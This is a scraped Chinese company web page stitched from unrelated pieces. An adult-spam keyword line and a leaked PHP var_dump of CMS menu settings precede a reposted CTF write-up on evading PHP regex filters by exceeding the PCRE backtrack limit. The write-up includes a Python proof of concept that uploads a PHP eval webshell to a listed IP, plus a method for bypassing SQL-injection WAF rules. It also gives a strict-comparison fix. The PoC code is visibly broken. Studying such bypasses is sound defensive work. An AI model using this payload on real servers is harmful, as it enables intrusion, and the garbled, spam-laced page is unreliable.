杏吧app下载,关婷娜被揉胸视频直播,杏吧之春暖花开有你

array(23) {
  ["id"] => string(2) "96"
  ["siteid"] => string(1) "1"
  ["type"] => string(1) "1"
  ["m_id"] => string(1) "0"
  ["p_id"] => string(1) "0"
  ["name"] => string(6) "服務(wù)"
  ["thumb"] => string(63) "/modules/cms/uploads/recommend/2018/05/15/05797102164099283.png"
  ["image"] => string(0) ""
  ["desc"] => string(0) ""
  ["pdir"] => string(0) ""
  ["dir"] => string(7) "service"
  ["url"] => string(0) ""
  ["setting"] => array(15) {
    ["is_html"] => int(1)
    ["content_is_html"] => int(0)
    ["urlrule"] => int(1)
    ["contenturlrule"] => int(0)
    ["meta_title"] => string(88) "定制開發(fā)-APP定制開發(fā),微信定制開發(fā),小程序定制開發(fā),網(wǎng)站定制開發(fā)"
    ["meta_keywords"] => string(75) "APP定制開發(fā),微信定制開發(fā),小程序定制開發(fā),網(wǎng)站定制開發(fā)"
    ["meta_description"] => string(0) ""
    ["category_template"] => string(0) ""
    ["list_template"] => string(0) ""
    ["show_template"] => string(21) "show_page_dingzhi.tpl"
    ["formid"] => string(0) ""
    ["url"] => string(0) ""
    ["target"] => string(0) ""
    ["pri_grade_visit"] => array(0) {
    }
    ["pri_grade_add"] => array(0) {
    }
  }
  ["order"] => string(1) "1"
  ["sethtml"] => string(1) "0"
  ["stat"] => string(1) "2"
  ["flowid"] => string(1) "0"
  ["image_mo"] => string(63) "/modules/cms/uploads/recommend/2018/05/25/05805654599261264.jpg"
  ["page_num"] => string(1) "0"
  ["wxstat"] => string(1) "0"
  ["scope"] => string(0) ""
  ["modelname"] => NULL
  ["son"] => array(9) {
    [0] => array(22) {
      ["id"] => string(3) "187"
      ["siteid"] => string(1) "1"
      ["type"] => string(1) "1"
      ["m_id"] => string(1) "0"
      ["p_id"] => string(2) "96"
      ["name"] => string(15) "小程序開發(fā)"
      ["thumb"] => string(0) ""
      ["image"] => string(0) ""
      ["desc"] => string(112) "專業(yè)微信小程序解決方案|各種場(chǎng)景核心功能,提前布局微信新生態(tài),搶占第一波紅利"
      ["pdir"] => string(0) ""
      ["dir"] => string(6) "wechat"
      ["url"] => string(0) ""
      ["setting"] => array(15) {
        ["is_html"] => int(1)
        ["content_is_html"] => int(0)
        ["urlrule"] => int(1)
        ["contenturlrule"] => int(0)
        ["meta_title"] => string(107) "小程序_商城小程序_門店小程序_微圈小程序_餐飲小程序開發(fā)-藝源科技小程序開發(fā)"
        ["meta_keywords"] => string(103) "小程序開發(fā),商城小程序開發(fā),門店小程序開發(fā),微圈小程序開發(fā),餐飲小程序開發(fā)"
        ["meta_description"] => string(269) "專注提供專注提供小程序、商城小程序、門店小程序、微圈小程序、餐飲小程序開發(fā),專業(yè)團(tuán)隊(duì),一對(duì)一服務(wù),助企業(yè)快速生成自己的移動(dòng)端微商城平臺(tái). 藝源科技小程序采用高性能數(shù)據(jù)架構(gòu),系統(tǒng)穩(wěn)定安全。"
        ["category_template"] => string(0) ""
        ["list_template"] => string(0) ""
        ["show_template"] => string(17) "show_page_xcx.tpl"
        ["formid"] => string(0) ""
        ["url"] => string(0) ""
        ["target"] => string(0) ""
        ["pri_grade_visit"] => array(0) {
        }
        ["pri_grade_add"] => array(0) {
        }
      }
      ["order"] => string(1) "0"
      ["sethtml"] => string(1) "0"
      ["stat"] => string(1) "2"
      ["flowid"] => string(1) "0"
      ["image_mo"] => string(0) ""
      ["page_num"] => string(1) "0"
      ["wxstat"] => string(1) "1"
      ["scope"] => string(0) ""
      ["modelname"] => NULL
    }
    [1] => array(22) {
      ["id"] => string(3) "199"
      ["siteid"] => string(1) "1"
      ["type"] => string(1) "1"
      ["m_id"] => string(1) "0"
      ["p_id"] => string(2) "96"
      ["name"] => string(9) "APP開發(fā)"
      ["thumb"] => string(0) ""
      ["image"] => string(0) ""
      ["desc"] => string(0) ""
      ["pdir"] => string(0) ""
      ["dir"] => string(3) "APP"
      ["url"] => string(0) ""
      ["setting"] => array(15) {
        ["is_html"] => int(1)
        ["content_is_html"] => int(0)
        ["urlrule"] => int(1)
        ["contenturlrule"] => int(0)
        ["meta_title"] => string(65) "app開發(fā)_app定制開發(fā)_app制作開發(fā)公司【藝源科技】"
        ["meta_keywords"] => string(53) "app開發(fā),app定制開發(fā)公司,app制作開發(fā)公司"
        ["meta_description"] => string(0) ""
        ["category_template"] => string(0) ""
        ["list_template"] => string(0) ""
        ["show_template"] => string(17) "show_page_app.tpl"
        ["formid"] => string(0) ""
        ["url"] => string(0) ""
        ["target"] => string(0) ""
        ["pri_grade_visit"] => array(0) {
        }
        ["pri_grade_add"] => array(0) {
        }
      }
      ["order"] => string(1) "1"
      ["sethtml"] => string(1) "0"
      ["stat"] => string(1) "2"
      ["flowid"] => string(1) "0"
      ["image_mo"] => string(0) ""
      ["page_num"] => string(1) "0"
      ["wxstat"] => string(1) "0"
      ["scope"] => string(0) ""
      ["modelname"] => NULL
    }
    [2] => array(22) {
      ["id"] => string(3) "244"
      ["siteid"] => string(1) "1"
      ["type"] => string(1) "1"
      ["m_id"] => string(1) "0"
      ["p_id"] => string(2) "96"
      ["name"] => string(12) "快抖霸屏"
      ["thumb"] => string(0) ""
      ["image"] => string(0) ""
      ["desc"] => string(0) ""
      ["pdir"] => string(0) ""
      ["dir"] => string(7) "kuaidou"
      ["url"] => string(0) ""
      ["setting"] => array(15) {
        ["is_html"] => int(1)
        ["content_is_html"] => int(0)
        ["urlrule"] => int(1)
        ["contenturlrule"] => int(0)
        ["meta_title"] => string(71) "快抖霸屏_抖音快手霸屏_短視頻營(yíng)銷獲客技術(shù)提供商!"
        ["meta_keywords"] => string(69) "快抖霸屏,抖音快手霸屏,快抖短視頻搜索,同城爆店碼"
        ["meta_description"] => string(161) "藝源智能云推廣系統(tǒng)13325455411專注快抖霸屏,抖音快手霸屏,同城爆店碼,一款線下與線上流量緊密結(jié)合的營(yíng)銷爆客解決方案。"
        ["category_template"] => string(0) ""
        ["list_template"] => string(0) ""
        ["show_template"] => string(20) "show_page_douyin.tpl"
        ["formid"] => string(0) ""
        ["url"] => string(0) ""
        ["target"] => string(0) ""
        ["pri_grade_visit"] => array(0) {
        }
        ["pri_grade_add"] => array(0) {
        }
      }
      ["order"] => string(1) "2"
      ["sethtml"] => string(1) "0"
      ["stat"] => string(1) "2"
      ["flowid"] => string(1) "0"
      ["image_mo"] => string(0) ""
      ["page_num"] => string(1) "0"
      ["wxstat"] => string(1) "0"
      ["scope"] => string(27) "需要短視頻推廣排名"
      ["modelname"] => NULL
    }
    [3] => array(22) {
      ["id"] => string(3) "207"
      ["siteid"] => string(1) "1"
      ["type"] => string(1) "1"
      ["m_id"] => string(1) "0"
      ["p_id"] => string(2) "96"
      ["name"] => string(14) "AI智能名片"
      ["thumb"] => string(0) ""
      ["image"] => string(63) "/modules/cms/uploads/recommend/2019/07/04/06155550417466502.jpg"
      ["desc"] => string(0) ""
      ["pdir"] => string(0) ""
      ["dir"] => string(2) "ai"
      ["url"] => string(0) ""
      ["setting"] => array(15) {
        ["is_html"] => int(1)
        ["content_is_html"] => int(0)
        ["urlrule"] => int(1)
        ["contenturlrule"] => int(0)
        ["meta_title"] => string(68) "藝源AI智能名片_名片小程序_智能名片_讓銷售更簡(jiǎn)單"
        ["meta_keywords"] => string(97) "藝源AI智能名片,名片小程序,智能名片_讓銷售更簡(jiǎn)單,電子名片,二維碼名片"
        ["meta_description"] => string(184) "藝源AI智能名片-讓銷售更簡(jiǎn)單。藝源AI智能名片為企業(yè)提供名片小程序,智能名片,企業(yè)名片,小程序名片,電子名片,二維碼名片等相關(guān)的服務(wù)。"
        ["category_template"] => string(0) ""
        ["list_template"] => string(0) ""
        ["show_template"] => string(16) "show_page_ai.tpl"
        ["formid"] => string(0) ""
        ["url"] => string(0) ""
        ["target"] => string(0) ""
        ["pri_grade_visit"] => array(0) {
        }
        ["pri_grade_add"] => array(0) {
        }
      }
      ["order"] => string(1) "3"
      ["sethtml"] => string(1) "0"
      ["stat"] => string(1) "2"
      ["flowid"] => string(1) "0"
      ["image_mo"] => string(0) ""
      ["page_num"] => string(1) "0"
      ["wxstat"] => string(1) "0"
      ["scope"] => string(0) ""
      ["modelname"] => NULL
    }
    [4] => array(22) {
      ["id"] => string(3) "201"
      ["siteid"] => string(1) "1"
      ["type"] => string(1) "1"
      ["m_id"] => string(1) "0"
      ["p_id"] => string(2) "96"
      ["name"] => string(12) "版權(quán)登記"
      ["thumb"] => string(0) ""
      ["image"] => string(63) "/modules/cms/uploads/recommend/2021/08/04/06814062280145708.jpg"
      ["desc"] => string(0) ""
      ["pdir"] => string(0) ""
      ["dir"] => string(9) "copyright"
      ["url"] => string(0) ""
      ["setting"] => array(15) {
        ["is_html"] => int(1)
        ["content_is_html"] => int(0)
        ["urlrule"] => int(1)
        ["contenturlrule"] => int(0)
        ["meta_title"] => string(0) ""
        ["meta_keywords"] => string(0) ""
        ["meta_description"] => string(0) ""
        ["category_template"] => string(0) ""
        ["list_template"] => string(0) ""
        ["show_template"] => string(23) "show_page_copyright.tpl"
        ["formid"] => string(0) ""
        ["url"] => string(0) ""
        ["target"] => string(0) ""
        ["pri_grade_visit"] => array(0) {
        }
        ["pri_grade_add"] => array(0) {
        }
      }
      ["order"] => string(1) "4"
      ["sethtml"] => string(1) "0"
      ["stat"] => string(1) "2"
      ["flowid"] => string(1) "0"
      ["image_mo"] => string(63) "/modules/cms/uploads/recommend/2021/08/04/06814063838873717.jpg"
      ["page_num"] => string(1) "0"
      ["wxstat"] => string(1) "0"
      ["scope"] => string(0) ""
      ["modelname"] => NULL
    }
    [5] => array(22) {
      ["id"] => string(3) "203"
      ["siteid"] => string(1) "1"
      ["type"] => string(1) "1"
      ["m_id"] => string(1) "0"
      ["p_id"] => string(2) "96"
      ["name"] => string(12) "商標(biāo)注冊(cè)"
      ["thumb"] => string(0) ""
      ["image"] => string(63) "/modules/cms/uploads/recommend/2021/08/03/06813359170749750.jpg"
      ["desc"] => string(0) ""
      ["pdir"] => string(0) ""
      ["dir"] => string(9) "trademark"
      ["url"] => string(0) ""
      ["setting"] => array(15) {
        ["is_html"] => int(1)
        ["content_is_html"] => int(0)
        ["urlrule"] => int(1)
        ["contenturlrule"] => int(0)
        ["meta_title"] => string(131) "商標(biāo)注冊(cè)_商標(biāo)注冊(cè)流程_商標(biāo)注冊(cè)流程及費(fèi)用_西安商標(biāo)注冊(cè)_西安商標(biāo)注冊(cè)代理-「源知果」藝源科技"
        ["meta_keywords"] => string(103) "商標(biāo)注冊(cè),商標(biāo)注冊(cè)流程,商標(biāo)注冊(cè)流程及費(fèi)用,西安商標(biāo)注冊(cè),西安商標(biāo)注冊(cè)代理"
        ["meta_description"] => string(182) "「源知果」西安提供代理版權(quán)登記,代理商標(biāo)注冊(cè),代理專利申請(qǐng),代理企業(yè)貫標(biāo),代理高新技術(shù)企業(yè)認(rèn)定的服務(wù);咨詢電話:13325455411。"
        ["category_template"] => string(0) ""
        ["list_template"] => string(0) ""
        ["show_template"] => string(23) "show_page_trademark.tpl"
        ["formid"] => string(0) ""
        ["url"] => string(0) ""
        ["target"] => string(0) ""
        ["pri_grade_visit"] => array(0) {
        }
        ["pri_grade_add"] => array(0) {
        }
      }
      ["order"] => string(1) "5"
      ["sethtml"] => string(1) "0"
      ["stat"] => string(1) "2"
      ["flowid"] => string(1) "0"
      ["image_mo"] => string(63) "/modules/cms/uploads/recommend/2019/06/11/06135617157272716.png"
      ["page_num"] => string(1) "0"
      ["wxstat"] => string(1) "0"
      ["scope"] => string(0) ""
      ["modelname"] => NULL
    }
    [6] => array(22) {
      ["id"] => string(3) "205"
      ["siteid"] => string(1) "1"
      ["type"] => string(1) "1"
      ["m_id"] => string(1) "0"
      ["p_id"] => string(2) "96"
      ["name"] => string(12) "網(wǎng)站建設(shè)"
      ["thumb"] => string(0) ""
      ["image"] => string(63) "/modules/cms/uploads/recommend/2019/06/21/06144566585327511.jpg"
      ["desc"] => string(149) "節(jié)約IT成本/降低運(yùn)維成本/網(wǎng)站安全穩(wěn)定/不滿意全額退款|節(jié)約IT成本/降低運(yùn)維成本/網(wǎng)站安全穩(wěn)定/不滿意全額退款"
      ["pdir"] => string(0) ""
      ["dir"] => string(7) "website"
      ["url"] => string(0) ""
      ["setting"] => array(15) {
        ["is_html"] => int(1)
        ["content_is_html"] => int(0)
        ["urlrule"] => int(1)
        ["contenturlrule"] => int(0)
        ["meta_title"] => string(80) "西安商城網(wǎng)站建設(shè)_政府網(wǎng)站建設(shè)_學(xué)校網(wǎng)站建設(shè)就選藝源科技"
        ["meta_keywords"] => string(113) "西安網(wǎng)站建設(shè),西安網(wǎng)絡(luò)公司,西安網(wǎng)頁(yè)設(shè)計(jì),商城網(wǎng)站建設(shè),政府網(wǎng)站建設(shè),學(xué)校網(wǎng)站建設(shè)"
        ["meta_description"] => string(248) "「藝源科技」是西安一家專業(yè)的西安商城網(wǎng)站建設(shè),政府網(wǎng)站建設(shè),學(xué)校網(wǎng)站建設(shè)的網(wǎng)絡(luò)公司,咨詢電話:029-88810146/150 9401 9029。公司擁有10年實(shí)踐經(jīng)驗(yàn),為您提供一條龍的互聯(lián)網(wǎng)應(yīng)用解決方案。"
        ["category_template"] => string(0) ""
        ["list_template"] => string(0) ""
        ["show_template"] => string(21) "show_page_website.tpl"
        ["formid"] => string(0) ""
        ["url"] => string(0) ""
        ["target"] => string(0) ""
        ["pri_grade_visit"] => array(0) {
        }
        ["pri_grade_add"] => array(0) {
        }
      }
      ["order"] => string(1) "6"
      ["sethtml"] => string(1) "0"
      ["stat"] => string(1) "2"
      ["flowid"] => string(1) "0"
      ["image_mo"] => string(63) "/modules/cms/uploads/recommend/2019/06/24/06146855992801864.jpg"
      ["page_num"] => string(1) "0"
      ["wxstat"] => string(1) "0"
      ["scope"] => string(0) ""
      ["modelname"] => NULL
    }
    [7] => array(22) {
      ["id"] => string(3) "208"
      ["siteid"] => string(1) "1"
      ["type"] => string(1) "2"
      ["m_id"] => string(1) "0"
      ["p_id"] => string(2) "96"
      ["name"] => string(15) "云服務(wù)平臺(tái)"
      ["thumb"] => string(0) ""
      ["image"] => string(0) ""
      ["desc"] => string(0) ""
      ["pdir"] => string(0) ""
      ["dir"] => string(0) ""
      ["url"] => string(0) ""
      ["setting"] => array(15) {
        ["is_html"] => int(0)
        ["content_is_html"] => int(0)
        ["urlrule"] => int(0)
        ["contenturlrule"] => int(0)
        ["meta_title"] => string(0) ""
        ["meta_keywords"] => string(0) ""
        ["meta_description"] => string(0) ""
        ["category_template"] => string(0) ""
        ["list_template"] => string(0) ""
        ["show_template"] => string(0) ""
        ["formid"] => string(0) ""
        ["url"] => string(21) "http://www.qulvkj.com"
        ["target"] => string(6) "_blank"
        ["pri_grade_visit"] => array(0) {
        }
        ["pri_grade_add"] => array(0) {
        }
      }
      ["order"] => string(1) "7"
      ["sethtml"] => string(1) "0"
      ["stat"] => string(1) "2"
      ["flowid"] => string(1) "0"
      ["image_mo"] => string(0) ""
      ["page_num"] => string(1) "0"
      ["wxstat"] => string(1) "0"
      ["scope"] => string(0) ""
      ["modelname"] => NULL
    }
    [8] => array(22) {
      ["id"] => string(3) "202"
      ["siteid"] => string(1) "1"
      ["type"] => string(1) "1"
      ["m_id"] => string(1) "0"
      ["p_id"] => string(2) "96"
      ["name"] => string(9) "SEO優(yōu)化"
      ["thumb"] => string(0) ""
      ["image"] => string(63) "/modules/cms/uploads/recommend/2021/08/03/06813061683398516.jpg"
      ["desc"] => string(0) ""
      ["pdir"] => string(0) ""
      ["dir"] => string(3) "seo"
      ["url"] => string(0) ""
      ["setting"] => array(15) {
        ["is_html"] => int(1)
        ["content_is_html"] => int(0)
        ["urlrule"] => int(1)
        ["contenturlrule"] => int(0)
        ["meta_title"] => string(90) "【西安SEO優(yōu)化_西安網(wǎng)站優(yōu)化_關(guān)鍵詞排名優(yōu)化】-SEO優(yōu)化公司藝源科技"
        ["meta_keywords"] => string(81) "西安SEO優(yōu)化,西安SEO優(yōu)化公司,西安網(wǎng)站優(yōu)化,西安網(wǎng)站優(yōu)化公司"
        ["meta_description"] => string(244) "藝源科技(yysweb.com),專注為企業(yè)提供百度等搜索引擎整站SEO優(yōu)化服務(wù),針對(duì)不同行業(yè)、網(wǎng)站情況給出不同策略、報(bào)價(jià)和SEO建議;是您值得信賴的seo診斷、顧問咨詢等云SEO技術(shù)服務(wù)外包商。"
        ["category_template"] => string(0) ""
        ["list_template"] => string(0) ""
        ["show_template"] => string(17) "show_page_seo.tpl"
        ["formid"] => string(0) ""
        ["url"] => string(0) ""
        ["target"] => string(0) ""
        ["pri_grade_visit"] => array(0) {
        }
        ["pri_grade_add"] => array(0) {
        }
      }
      ["order"] => string(1) "8"
      ["sethtml"] => string(1) "0"
      ["stat"] => string(1) "2"
      ["flowid"] => string(1) "0"
      ["image_mo"] => string(63) "/modules/cms/uploads/recommend/2021/08/03/06813062712033401.jpg"
      ["page_num"] => string(1) "0"
      ["wxstat"] => string(1) "0"
      ["scope"] => string(0) ""
      ["modelname"] => NULL
    }
  }
}
PHP利用PCRE回溯次數(shù)限制繞過某些安全限制
時(shí)間:2018-12-11 10:35:56
文章發(fā)布:李陽
原創(chuàng)作者:未知
來源:互聯(lián)網(wǎng)

這次 Code-Breaking Puzzles 中我出了一道看似很簡(jiǎn)單的題目pcrewaf,將其代碼簡(jiǎn)化如下:


<?php function is_php($data){       
    return preg_match('/<?.*[(`;?>].*/is', $data);
    }  

    if(!is_php($input)) {     
    // fwrite($f, $input); ... 
    } 


大意是判斷一下用戶輸入的內(nèi)容有沒有 PHP 代碼,如果沒有,則寫入文件。這種時(shí)候,如何繞過 is_php() 函數(shù)來寫入 webshell 呢?


這道題看似簡(jiǎn)單,深究其原理,還是值得寫一篇文章的。


一、正則表達(dá)式是什么


正則表達(dá)式是一個(gè)可以被「有限狀態(tài)自動(dòng)機(jī)」接受的語言類。


「有限狀態(tài)自動(dòng)機(jī)」,其擁有有限數(shù)量的狀態(tài),每個(gè)狀態(tài)可以遷移到零個(gè)或多個(gè)狀態(tài),輸入字串決定執(zhí)行哪個(gè)狀態(tài)的遷移。

而常見的正則引擎,又被細(xì)分為 DFA(確定性有限狀態(tài)自動(dòng)機(jī))與 NFA(非確定性有限狀態(tài)自動(dòng)機(jī))。他們匹配輸入的過程分別是:


  • DFA:從起始狀態(tài)開始,一個(gè)字符一個(gè)字符地讀取輸入串,并根據(jù)正則來一步步確定至下一個(gè)轉(zhuǎn)移狀態(tài),直到匹配不上或走完整個(gè)輸入


  • NFA:從起始狀態(tài)開始,一個(gè)字符一個(gè)字符地讀取輸入串,并與正則表達(dá)式進(jìn)行匹配,如果匹配不上,則進(jìn)行回溯,嘗試其他狀態(tài)


由于 NFA 的執(zhí)行過程存在回溯,所以其性能會(huì)劣于 DFA,但它支持更多功能。大多數(shù)程序語言都使用了 NFA 作為正則引擎,其中也包括 PHP 使用的  PCRE 庫(kù)。


二、回溯的過程是怎樣的


所以,我們題目中的正則 <?.*[(`;?>].*,假設(shè)匹配的輸入是


PHP利用PCRE回溯次數(shù)限制繞過某些安全限制-藝源科技


見上圖,可見第 4 步的時(shí)候,因?yàn)榈谝粋€(gè) .* 可以匹配任何字符,所以最終匹配到了輸入串的結(jié)尾,也就是  //aaaaa。但此時(shí)顯然是不對(duì)的,因?yàn)檎齽t顯示.*后面還應(yīng)該有一個(gè)字符 [(`;?>]。


所以 NFA 就開始回溯,先吐出一個(gè) a,輸入變成第 5 步顯示的 //aaaa,但仍然匹配不上正則,繼續(xù)吐出 a,變成  //aaa,仍然匹配不上……


最終直到吐出;,輸入變成第 12 步顯示的 ]  ,這個(gè)結(jié)果滿足正則表達(dá)式的要求,于是不再回溯。13 步開始向后匹配;,14 步匹配.*,第二個(gè).*匹配到了字符串末尾,最后結(jié)束匹配。


在調(diào)試正則表達(dá)式的時(shí)候,我們可以查看當(dāng)前回溯的次數(shù):


PHP利用PCRE回溯次數(shù)限制繞過某些安全限制-藝源科技


這里回溯了 8 次。


三、PHP 的 pcre.backtrack_limit 限制利用


PHP 為了防止正則表達(dá)式的拒絕服務(wù)攻擊(reDOS),給 pcre 設(shè)定了一個(gè)回溯次數(shù)上限 pcre.backtrack_limit。我們可以通過   var_dump(ini_get(‘pcre.backtrack_limit’));的方式查看當(dāng)前環(huán)境下的上限:


PHP利用PCRE回溯次數(shù)限制繞過某些安全限制-藝源科技


這里有個(gè)有趣的事情,就是 PHP 文檔中,中英文版本的數(shù)值是不一樣的:


PHP利用PCRE回溯次數(shù)限制繞過某些安全限制-藝源科技-藝源科技


我們應(yīng)該以英文版為參考。


可見,回溯次數(shù)上限默認(rèn)是 100 萬。那么,假設(shè)我們的回溯次數(shù)超過了 100 萬,會(huì)出現(xiàn)什么現(xiàn)象呢?比如:


PHP利用PCRE回溯次數(shù)限制繞過某些安全限制-藝源科技


可見,preg_match 返回的非 1 和 0,而是 false。


preg_match 函數(shù)返回 false 表示此次執(zhí)行失敗了,我們可以調(diào)用 var_dump(preg_last_error() ===  PREG_BACKTRACK_LIMIT_ERROR);,發(fā)現(xiàn)失敗的原因的確是回溯次數(shù)超出了限制:


PHP利用PCRE回溯次數(shù)限制繞過某些安全限制-藝源科技


所以,這道題的答案就呼之欲出了。我們通過發(fā)送超長(zhǎng)字符串的方式,使正則執(zhí)行失敗,最后繞過目標(biāo)對(duì) PHP 語言的限制。

對(duì)應(yīng)的 POC 如下:


import requests 
from io import BytesIO 
files = { 
'file': BytesIO(b'aaa<?php eval($_POST[txt]);//' + b'a' * 1000000) 
res = requests.post('http://51.158.75.42:8088/index.php', filesfiles=files, allow_redirects=False
print(res.headers)


四、PCRE 另一種錯(cuò)誤的用法


延伸一下,很多基于 PHP 的 WAF,如:


<?php if(preg_match('/SELECT.+FROM.+/is', $input)) {     die('SQL Injection'); } 


均存在上述問題,通過大量回溯可以進(jìn)行繞過。


另外,我遇到更常見的一種 WAF 是:


<?php 
    if(preg_match('/UNION.+?SELECT/is', $input)) {
    die('SQL Injection');
    } 


這里涉及到了正則表達(dá)式的「非貪婪模式」。在 NFA 中,如果我輸入 UNION/*aaaaa*/SELECT,這個(gè)正則表達(dá)式執(zhí)行流程如下:


  • .+? 匹配到/


  • 因?yàn)榉秦澙纺J剑?+? 停止匹配,而由 S 匹配*


  • S 匹配*失敗,回溯,再由.+? 匹配*


  • 因?yàn)榉秦澙纺J?,所?+? 停止匹配,而由 S 匹配 a


  • S 匹配 a 失敗,回溯,再由.+? 匹配 a



回溯次數(shù)隨著 a 的數(shù)量增加而增加。所以,我們?nèi)匀豢梢酝ㄟ^發(fā)送大量 a,來使回溯次數(shù)超出 pcre.backtrack_limit 限制,進(jìn)而繞過  WAF:


PHP利用PCRE回溯次數(shù)限制繞過某些安全限制-藝源科技

五、修復(fù)方法


那么,如何修復(fù)這個(gè)問題呢?


其實(shí)如果我們仔細(xì)觀察 PHP 文檔,是可以看到 preg_match 函數(shù)下面的警告的:



如果用 preg_match 對(duì)字符串進(jìn)行匹配,一定要使用===全等號(hào)來判斷返回值,如:


<?php 
function is_php($data){   
return preg_match('/<?.*[(`;?>].*/is', $data);   
if(is_php($input) === 0) {
// fwrite($f, $input); ... 
}


這樣,即使正則執(zhí)行失敗返回 false,也不會(huì)進(jìn)入 if 語句。

小程序開發(fā)
標(biāo)簽: 正則引擎
*版權(quán)申明:本站部分文章由藝源科技收集整理,不代表我們的觀點(diǎn)。如果這篇轉(zhuǎn)載侵犯您的版權(quán),請(qǐng)及時(shí)聯(lián)系我們刪除!
為您推薦
最新文章
掃碼加他,免費(fèi)獲取方案